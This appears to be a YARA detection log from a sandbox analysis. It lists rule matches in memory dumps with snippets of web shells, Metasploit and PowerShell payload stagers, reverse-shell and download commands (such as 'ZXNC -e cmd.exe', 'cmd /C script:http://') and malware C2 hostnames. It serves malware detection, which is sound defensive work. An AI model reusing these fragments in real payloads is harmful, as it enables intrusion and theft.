00000013.00000003.433232225.00000000052E4000.00000004.00000001.sdmp	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0x8f5e:$s2: Auditcleaner 0xa6a6:$s11: elatedmonkey 0xa716:$elf4: charm_saver 0x976e:$elf12: envoytomato 0x973e:$elf14: estopmoonlit 0xa8d7:$elf17: ghost_sparc 0xa1c6:$elf19: orleans_stride 0x9ec6:$elf21: seconddate 0xa716:$pe2: charm_saver 0xa8e3:$pe3: ghost_x86
00000013.00000003.413817784.00000000052A4000.00000004.00000001.sdmp	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0x48f5e:$s2: Auditcleaner 0x4a6a6:$s11: elatedmonkey 0x4a716:$elf4: charm_saver 0x4976e:$elf12: envoytomato 0x4973e:$elf14: estopmoonlit 0x4a8d7:$elf17: ghost_sparc 0x4a1c6:$elf19: orleans_stride 0x49ec6:$elf21: seconddate 0x4a716:$pe2: charm_saver 0x4a8e3:$pe3: ghost_x86
00000003.00000002.522931627.000000000237B000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x51cf:$a: Amplia Security 0x5347:$a: Amplia Security 0x5365:$c: getlsasrvaddr.exe 0x5385:$d: Cannot get PID of LSASS.EXE 0x53af:$e: extract the TGT session key 0x53d9:$f: PPWDUMP_DATA
00000003.00000002.522931627.000000000237B000.00000004.00000001.sdmp	scanarator	Auto-generated rule on file scanarator.exe	yarGen Yara Rule Generator by Florian Roth	0x5103:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
0000000A.00000003.324801435.0000000006627000.00000004.00000001.sdmp	webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit	Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php	Florian Roth	0xe90:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
0000000A.00000003.324801435.0000000006627000.00000004.00000001.sdmp	WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit	PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php	Florian Roth	0xe90:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x2faf0:$c: getlsasrvaddr.exe 0x33420:$e: extract the TGT session key
00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp	SQLMap	This signature detects the SQLMap SQL injection tool	Florian Roth	0x416f0:$s1: except SqlmapBaseException, ex:
00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp	PortRacer	Auto-generated rule on file PortRacer.exe	yarGen Yara Rule Generator by Florian Roth	0x33090:$s0: Auto Scroll BOTH Text Boxes 0x334e0:$s4: Start/Stop Portscanning 0x416b8:$s6: Auto Save LogFile by pressing STOP
0000000A.00000003.318816470.000000000688B000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x12768:$f: PPWDUMP_DATA
0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x179d0:$a: Amplia Security
0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp	webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat	Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php	Florian Roth	0x17bf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } 0x17d38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp	Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php	Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x17e79:$s0: Safe0ver
00000013.00000003.481677976.0000000006BA6000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x7818:$x5: p0wnedShellx64
0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x179d0:$a: Amplia Security
0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp	webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat	Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php	Florian Roth	0x17bf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } 0x17d38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp	Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php	Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x17e79:$s0: Safe0ver
00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x67af0:$c: getlsasrvaddr.exe 0x6b420:$e: extract the TGT session key 0xaf90:$f: PPWDUMP_DATA
00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp	SQLMap	This signature detects the SQLMap SQL injection tool	Florian Roth	0x796f0:$s1: except SqlmapBaseException, ex:
00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp	PortRacer	Auto-generated rule on file PortRacer.exe	yarGen Yara Rule Generator by Florian Roth	0x6b090:$s0: Auto Scroll BOTH Text Boxes 0x6b4e0:$s4: Start/Stop Portscanning 0x796b8:$s6: Auto Save LogFile by pressing STOP
0000000A.00000003.325411258.0000000006626000.00000004.00000001.sdmp	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0xa7e:$s11: elatedmonkey 0x656:$elf4: charm_saver 0xf76:$elf8: ebbshave 0xd96:$elf9: eggbasket 0xa47:$elf17: ghost_sparc 0xeae:$elf18: jackpop 0x656:$pe2: charm_saver 0xa53:$pe3: ghost_x86
00000013.00000003.454771924.0000000006D6F000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x12e80:$php: <? 0x15668:$php: <? 0x16959:$php: <? 0x18dd8:$php: <? 0x18dde:$payload3: eval(gzuncompress(base64_decode(
00000013.00000003.454771924.0000000006D6F000.00000004.00000001.sdmp	webshell_php_h6ss	Web Shell - file h6ss.php	Florian Roth	0x18dd8:$s0: <?php eval(gzuncompress(base64_decode("
00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x7580:$a: Amplia Security
00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp	Fierce2	This signature detects the Fierce2 domain scanner	Florian Roth	0x7398:$s1: $tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,
00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp	webshell_Shell_ci_Biz_was_here_c100_v_xxx	Web Shell - from files Shell [ci	unknown	0x7758:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null" 0x71b8:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp	Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php	Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x7439:$s0: Safe0ver
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Msfpayloads_msf	Metasploit Payloads - file msf.sh	Florian Roth	0x3c2f6:$s1: export buf=\
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Msfpayloads_msf_2	Metasploit Payloads - file msf.asp	Florian Roth	0x3c42f:$s1: & "\" & "svchost.exe" 0x3f71:$s2: CreateObject("Wscript.Shell") 0x3c449:$s2: CreateObject("Wscript.Shell") 0x3d6bf:$s2: CreateObject("Wscript.Shell") 0x3df17:$s2: CreateObject("Wscript.Shell") 0x3c46b:$s3: <% @language="VBScript" %>
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Msfpayloads_msf_psh	Metasploit Payloads - file msf-psh.vba	Florian Roth	0x3efe:$s1: powershell.exe -nop -w hidden -e 0x3c5b8:$s1: powershell.exe -nop -w hidden -e 0x3cab1:$s1: powershell.exe -nop -w hidden -e 0x3c5dd:$s2: Call Shell( 0x3c5ed:$s3: Sub Workbook_Open()
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Msfpayloads_msf_exe	Metasploit Payloads - file msf-exe.vba	Florian Roth	0x3cd5f:$s1: '* PAYLOAD DATA 0x3cd73:$s2: = Shell( 0x3cd81:$s3: = Environ("USERPROFILE") 0x3cd9e:$s4: '************************************************************** 0x3cde2:$s5: ChDir ( 0x3cdee:$s6: '* MACRO CODE
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Msfpayloads_msf_3	Metasploit Payloads - file msf.psh	Florian Roth	0x3cf28:$s1: [DllImport("kernel32.dll")] public static extern int WaitForSingleObject( 0x3cf76:$s2: public enum MemoryProtection { ExecuteReadWrite = 0x40 } 0x3cfb3:$s3: .func]::VirtualAlloc(0, 0x3cfcf:$s4: .func+AllocationType]::Reserve -bOr [ 0x3cff9:$s5: New-Object System.CodeDom.Compiler.CompilerParameters 0x3d033:$s6: ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location)) 0x3d084:$s7: public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 } 0x3d0c9:$s8: .func]::CreateThread(0,0,$ 0x3d0e8:$s9: public enum Time : uint { Infinite = 0xFFFFFFFF } 0x3d11f:$s10: = [System.Convert]::FromBase64String("/ 0x3d14c:$s11: { $global:result = 3; return }
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Msfpayloads_msf_4	Metasploit Payloads - file msf.aspx	Florian Roth	0x3d298:$s1: = VirtualAlloc(IntPtr.Zero,(UIntPtr) 0x3d2c1:$s2: .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); 0x3d2f2:$s3: [System.Runtime.InteropServices.DllImport("kernel32")] 0x3d32d:$s4: private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; 0x3d36c:$s5: private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Msfpayloads_msf_exe_2	Metasploit Payloads - file msf-exe.aspx	Florian Roth	0x3d515:$x1: = new System.Diagnostics.Process(); 0x3d53d:$x2: .StartInfo.UseShellExecute = true; 0x3d564:$x3: , "svchost.exe"); 0x3d57a:$s4: = Path.GetTempPath();
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Msfpayloads_msf_6	Metasploit Payloads - file msf.vbs	Florian Roth	0x3f6f:$s1: = CreateObject("Wscript.Shell") 0x3d6bd:$s1: = CreateObject("Wscript.Shell") 0x3df15:$s1: = CreateObject("Wscript.Shell") 0x3abee:$s2: = CreateObject("Scripting.FileSystemObject") 0x3d6e1:$s2: = CreateObject("Scripting.FileSystemObject") 0x3dee4:$s2: = CreateObject("Scripting.FileSystemObject") 0x3d712:$s3: .GetSpecialFolder(2) 0x3d72b:$s4: .Write Chr(CLng(" 0x3d741:$s5: = "4d5a90000300000004000000ffff00 0x3d767:$s6: For i = 1 to Len( 0x3d77d:$s7: ) Step 2
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Msfpayloads_msf_7	Metasploit Payloads - file msf.vba	Florian Roth	0x3c8d7:$s1: Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal 0x3c91f:$s2: = VirtualAlloc(0, UBound(Tsw), &H1000, &H40) 0x3c950:$s3: = RtlMoveMemory(
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Msfpayloads_msf_8	Metasploit Payloads - file msf.ps1	Florian Roth	0x3cf28:$s1: [DllImport("kernel32.dll")] 0x3d8b2:$s1: [DllImport("kernel32.dll")] 0x3d8d2:$s2: [DllImport("msvcrt.dll")] 0x3d8f0:$s3: -Name "Win32" -namespace Win32Functions -passthru 0x3d926:$s4: ::VirtualAlloc(0,[Math]::Max($ 0x3d949:$s5: .Length,0x1000),0x3000,0x40) 0x3d96a:$s6: public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 0x3d9de:$s7: ::memset([IntPtr]($
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Msfpayloads_msf_cmd	Metasploit Payloads - file msf-cmd.ps1	Florian Roth	0x3ca93:$x1: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x3db34:$s1: if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) 0x3db82:$s2: .concat(".exe"); 0x3db97:$s3: [0] = "chmod"; 0x3dbaa:$s4: = Runtime.getRuntime().exec( 0x3dbcb:$s5: , 16) & 0xff;
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Msfpayloads_msf_11	Metasploit Payloads - file msf.hta	Florian Roth	0x3de98:$s1: .ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then 0x3abee:$s2: = CreateObject("Scripting.FileSystemObject") 0x3d6e1:$s2: = CreateObject("Scripting.FileSystemObject") 0x3dee4:$s2: = CreateObject("Scripting.FileSystemObject") 0x3df15:$s3: = CreateObject("Wscript.Shell")
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x3e068:$s1: kernel32.dll WaitForSingleObject), 0x3e08f:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x3e106:$s3: GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object 0x3e16c:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x8e6:$s5: = [System.Convert]::FromBase64String( 0x3d11f:$s5: = [System.Convert]::FromBase64String( 0x3e1af:$s5: = [System.Convert]::FromBase64String( 0x3e1d9:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x3e213:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0xaafb:$s1: WS2_32.dll 0x93b8:$s2: ReflectiveLoader 0x9421:$s2: ReflectiveLoader 0x9839:$s2: ReflectiveLoader 0x98b5:$s2: ReflectiveLoader 0xd84b:$s2: ReflectiveLoader 0xd89b:$s2: ReflectiveLoader 0xe30b:$s2: ReflectiveLoader 0xe80c:$s2: ReflectiveLoader 0xeb1a:$s2: ReflectiveLoader
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	CVE_2017_8759_SOAP_Excel	Detects malicious files related to CVE-2017-8759	Florian Roth	0x5b73:$s1: \|'soap:wsdl=
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	PowerShell_ISESteroids_Obfuscation	Detects PowerShell ISESteroids obfuscation	Florian Roth	0x15830:$x1: /\/===\__ 0x1583e:$x2: ${__/\/== 0x1584c:$x3: Catch { } 0x1585a:$x4: \_/=} ${_
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Reflective_DLL_Loader_Aug17_1	Detects Reflective DLL Loader	Florian Roth	0x936a:$x1: \Release\reflective_dll.pdb 0x938a:$x2: reflective_dll.x64.dll 0x93a5:$s3: DLL Injection 0x93b7:$s4: ?ReflectiveLoader@@YA_KPEAX@Z 0x9420:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Reflective_DLL_Loader_Aug17_2	Detects Reflective DLL Loader - suspicious - Possible FP could be program crack	Florian Roth	0x97eb:$x1: \ReflectiveDLLInjection-master\ 0x980f:$s2: reflective_dll.dll 0x9a73:$s2: reflective_dll.dll 0x9ab4:$s2: reflective_dll.dll 0x9826:$s3: DLL injection 0x9838:$s4: _ReflectiveLoader@4 0x98b4:$s4: _ReflectiveLoader@4 0xeb19:$s4: _ReflectiveLoader@4 0x9850:$s5: Reflective Dll Injection
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Reflective_DLL_Loader_Aug17_3	Detects Reflective DLL Loader	Florian Roth	0x9a20:$s1: \Release\inject.pdb 0x9a38:$s2: !!! Failed to gather information on system processes! 0x980f:$s3: reflective_dll.dll 0x9a73:$s3: reflective_dll.dll 0x9ab4:$s3: reflective_dll.dll 0x9a8a:$s4: [-] %s. Error=%d 0x9a9f:$s5: \Start Menu\Programs\reflective_dll.dll
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	VBScript_Favicon_File	VBScript cloaked as Favicon file used in Leviathan incident	Florian Roth	0x379:$x1: myxml = '<?xml version=""1.0"" encoding=""UTF-8""?>';myxml = myxml +'<root> 0x3c9:$x2: .Run "taskkill /im mshta.exe 0x3ea:$x3: <script language="VBScript">Window.ReSizeTo 0, 0 : Window.moveTo -2000,-2000 : 0x43d:$s1: .ExpandEnvironmentStrings("%ALLUSERSPROFILE%") & 0x472:$s2: .ExpandEnvironmentStrings("%temp%") &
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Backdoor_Redosdru_Jun17	Detects malware Redosdru - file systemHome.exe	Florian Roth	0x18174:$x1: %s\%d.gho 0x11444:$x2: %s\nt%s.dll 0x18182:$x2: %s\nt%s.dll 0x18192:$x3: baijinUPdate 0x11454:$s1: RegQueryValueEx(Svchost\netsvcs) 0x181a3:$s1: RegQueryValueEx(Svchost\netsvcs) 0x181c8:$s2: serviceone 0x181d7:$s3: \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#f \x1F# 0x18242:$s4: servicetwo 0x18251:$s5: UpdateCrc 0x1825f:$s6: \x1F#[ \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F# 0x182ba:$s7: nwsaPAgEnT 0x182c9:$s8: %-24s %-15s 0x%x(%d)
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Backdoor_Nitol_Jun17	Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader	Florian Roth	0x110e2:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01) 0x18456:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01) 0x11132:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1) 0x184a6:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1) 0x184ef:$x3: TCPConnectFloodThread.target = %s 0x18515:$s1: \Program Files\Internet Explorer\iexplore.exe 0x18547:$s2: %c%c%c%c%c%c.exe 0x1855c:$s3: GET %s%s HTTP/1.1 0x18572:$s4: CCAttack.target = %s 0x112bd:$s5: Accept-Language: zh-cn 0x1858b:$s5: Accept-Language: zh-cn 0x185a6:$s6: jdfwkey 0x185b2:$s7: hackqz.f3322.org:8880
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	WScript_Shell_PowerShell_Combo	Detects malware from Middle Eastern campaign reported by Talos	Florian Roth	0x2b47:$s1: .CreateObject("WScript.Shell") 0x1a467:$s1: .CreateObject("WScript.Shell") 0x1a60b:$s1: .CreateObject("WScript.Shell") 0x3d30:$p1: powershell.exe 0x3d57:$p1: powershell.exe 0x3efe:$p1: powershell.exe 0x3f3b:$p1: powershell.exe 0x56df:$p1: powershell.exe 0xd0b0:$p1: powershell.exe 0xd20b:$p1: powershell.exe 0xd249:$p1: powershell.exe 0x1030e:$p1: powershell.exe 0x133ee:$p1: powershell.exe 0x38d6a:$p1: powershell.exe 0x3b774:$p1: powershell.exe 0x3bbd0:$p1: powershell.exe 0x3c5b8:$p1: powershell.exe 0x3cab1:$p1: powershell.exe 0x3deca:$p1: powershell.exe 0x8e8:$p3: [System.Convert]::FromBase64String( 0x3d121:$p3: [System.Convert]::FromBase64String(
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	HTA_with_WScript_Shell	Detects WScript Shell in HTA	Florian Roth	0x15f02:$s1: <hta:application windowstate="minimize"/> 0x16093:$s1: <hta:application windowstate="minimize"/> 0x15f30:$s2: <script>var b=new ActiveXObject("WScript.Shell");
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	HTA_Embedded	Detects an embedded HTA file	Florian Roth	0x15f02:$s1: <hta:application windowstate="minimize"/> 0x16093:$s1: <hta:application windowstate="minimize"/>
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	StoneDrill	Detects malware from StoneDrill threat report	Florian Roth	0x3a91f:$s1: Hello dear 0x3a92e:$s2: WRZRZRAR 0x3a93d:$opa1: 66 89 45 D8 6A 64 FF 0x3a94b:$opa2: 8D 73 01 90 0F BF 51 FE
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	StoneDrill_VBS_1	Detects malware from StoneDrill threat report	Florian Roth	0x3aad0:$x1: wmic /NameSpace:\\root\default Class StdRegProv Call SetStringValue hDefKey = "&H80000001" sSubKeyName = "Software\Micros 0x3ab4e:$x2: ping 1.0.0.0 -n 1 -w 20000 > nul 0x3ab73:$s1: WshShell.CopyFile "%COMMON_APPDATA%\Chrome\ 0x3aba3:$s2: WshShell.DeleteFile "%temp%\ 0x3abc4:$s3: WScript.Sleep(10 * 1000) 0x3abe1:$s4: Set WshShell = CreateObject("Scripting.FileSystemObject") While WshShell.FileExists(" 0x3ac3b:$s5: , "%COMMON_APPDATA%\Chrome\
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	ZxShell_Jul17	Detects a ZxShell - CN threat group	Florian Roth	0x115a6:$x1: zxplug -add 0x115b6:$x2: getxxx c:\xyz.dll 0x115cc:$x3: downfile -d c:\windows\update.exe 0x115f2:$x4: -fromurl http://x.x.x/x.dll 0x11612:$x5: ping 127.0.0.1 -n 7&cmd.exe /c net start %s 0x11642:$x6: ZXNC -e cmd.exe x.x.x.x 0x1165e:$x7: (bind a cmdshell) 0x11674:$x8: ZXFtpServer 21 20 zx 0x1168d:$x9: ZXHttpServer 0x1169f:$x10: c:\error.htm,.exe\|c:\a.exe,.zip\|c:\b.zip" 0x116ce:$x11: c:\windows\clipboardlog.txt 0x116ef:$x12: AntiSniff -a wireshark.exe 0x1170f:$x13: c:\windows\keylog.txt
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EternalRocks_taskhost	Detects EternalRocks Malware - file taskhost.exe	Florian Roth	0x19abd:$s1: sTargetIP 0x19acb:$s2: SERVER_2008R2_SP0 0x19ae1:$s3: 20D5CCEE9C91A1E61F72F46FA117B93FB006DB51 0x19b0e:$s4: 9EBF75119B8FC7733F77B06378F9E735D34664F6
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	BeyondExec_RemoteAccess_Tool	Detects BeyondExec Remote Access Tool - file rexesvr.exe	Florian Roth	0x38f02:$x1: \BeyondExecV2\Server\Release\Pipes.pdb 0x38f2d:$x2: \\.\pipe\beyondexec%d-stdin 0x38f4d:$x3: Failed to create dispatch pipe. Do you have another instance running? 0x38f98:$op1: 83 E9 04 72 0C 83 E0 03 03 C8 FF 24 85 80 6F 40 0x38fae:$op2: 6A 40 33 C0 59 BF E0 D8 40 00 F3 AB 8D 0C 52 C1
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Disclosed_0day_POCs_injector	Detects POC code from disclosed 0day hacktool set	Florian Roth	0x128be:$x1: \Release\injector.pdb 0x128d8:$x2: Cannot write the shellcode in the process memory, error: 0x12916:$x3: /s shellcode_file PID: shellcode injection. 0x12946:$x4: /d dll_file PID: dll injection via LoadLibrary(). 0x12916:$x5: /s shellcode_file PID 0x1297c:$x5: /s shellcode_file PID 0x12996:$x6: Shellcode copied in memory: OK 0x129b9:$x7: Usage of the injector. 0x129d5:$x8: KO: cannot obtain the SeDebug privilege.
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	APT_PupyRAT_PY	Detects Pupy RAT	Florian Roth	0xa0de:$x1: reflective_inject_dll 0xa15f:$x1: reflective_inject_dll 0xa179:$x1: reflective_inject_dll 0x3b8f8:$x1: reflective_inject_dll 0x3b912:$x2: ImportError: pupy builtin module not found ! 0x3b943:$x3: please start pupy from either it's exe stub or it's reflective DLLR; 0xa132:$x4: [INJECT] inject_dll. 0x3b98c:$x4: [INJECT] inject_dll. 0x3b9a5:$x5: import base64,zlib;exec zlib.decompress(base64.b64decode('eJzzcQz1c/ZwDbJVT87Py0tNLlHnAgA56wXS')) 0x3ba0c:$op1: 8B 42 0C 8B 78 14 89 5C 24 18 89 7C 24 14 3B FD
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	OilRig_Strings_Oct17	Detects strings from OilRig malware and malicious scripts	Florian Roth	0x651:$x1: %localappdata%\srvHealth.exe 0x672:$x2: %localappdata%\srvBS.txt 0x68f:$x3: Agent Injector\PolicyConverter\Inner\obj\Release\Inner.pdb 0x6ce:$x4: Agent Injector\PolicyConverter\Joiner\obj\Release\Joiner.pdb 0x70f:$s3: .LoadDll("Run", arg, "C:\\Windows\\
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Suspicious_Script_Running_from_HTTP	Detects a suspicious	Florian Roth	0x91a9:$s1: cmd /C script:http:// 0x91c3:$s2: cmd /C script:https:// 0x91de:$s3: cmd.exe /C script:http:// 0x91fc:$s4: cmd.exe /C script:https://
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	VBS_dropper_script_Dec17_1	Detects a supicious VBS script that drops an executable	Florian Roth	0x89e:$s5: TVqQAAMAAAAEAA 0xf6e3:$s5: TVqQAAMAAAAEAA 0x3f6f:$a1: = CreateObject("Wscript.Shell") 0x3d6bd:$a1: = CreateObject("Wscript.Shell") 0x3df15:$a1: = CreateObject("Wscript.Shell")
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Industroyer_Malware_1	Detects Industroyer related malware	Florian Roth	0x1706d:$s1: haslo.exe 0x170ce:$x1: 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61 ... 0x1711a:$x2: haslo.datCrash
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Industroyer_Portscan_3_Output	Detects Industroyer related custom port scaner output file	Florian Roth	0x16ef3:$s1: WSA library load complite. 0x16f12:$s2: Connection refused
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Industroyer_Malware_4	Detects Industroyer related malware	Florian Roth	0x177aa:$s2: defragsvc 0x177b8:$a1: 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Industroyer_Malware_5	Detects Industroyer related malware	Florian Roth	0x17907:$x1: D2MultiCommService.exe 0x17922:$x2: Crash104.dll 0x17933:$x3: iec104.log 0x17942:$x4: IEC-104 client: ip=%s; port=%s; ASDU=%u 0x1796f:$s1: Error while getaddrinfo executing: %d 0x17999:$s2: return info-Remote command 0x179b8:$s3: Error killing process ... 0x179d6:$s4: stop_comm_service_name 0x179f1:$s5: 1 Data exchange: Send: %d (%s)
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	redSails_PY	Detects Red Sails Hacktool - Python	Florian Roth	0x3b05:$x1: Gained command shell on host 0x3b26:$x2: [!] Received an ERROR in shell() 0x3b4b:$x3: Target IP address with backdoor installed 0x3b79:$x4: Open backdoor port on target machine 0x3ba2:$x5: Backdoor port to open on victim machine
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Rehashed_RAT_2	Detects malware from Rehashed RAT incident	Florian Roth	0x7417:$x1: dalat.dulichovietnam.net 0x7434:$x2: web.Thoitietvietnam.org 0x7450:$a1: User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64) 0x749a:$a2: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3 0x751f:$s1: GET /%s%s%s%s HTTP/1.1 0x753a:$s2: http://%s:%d/%s%s%s%s 0x7554:$s3: {521338B8-3378-58F7-AFB9-E7D35E683BF8}
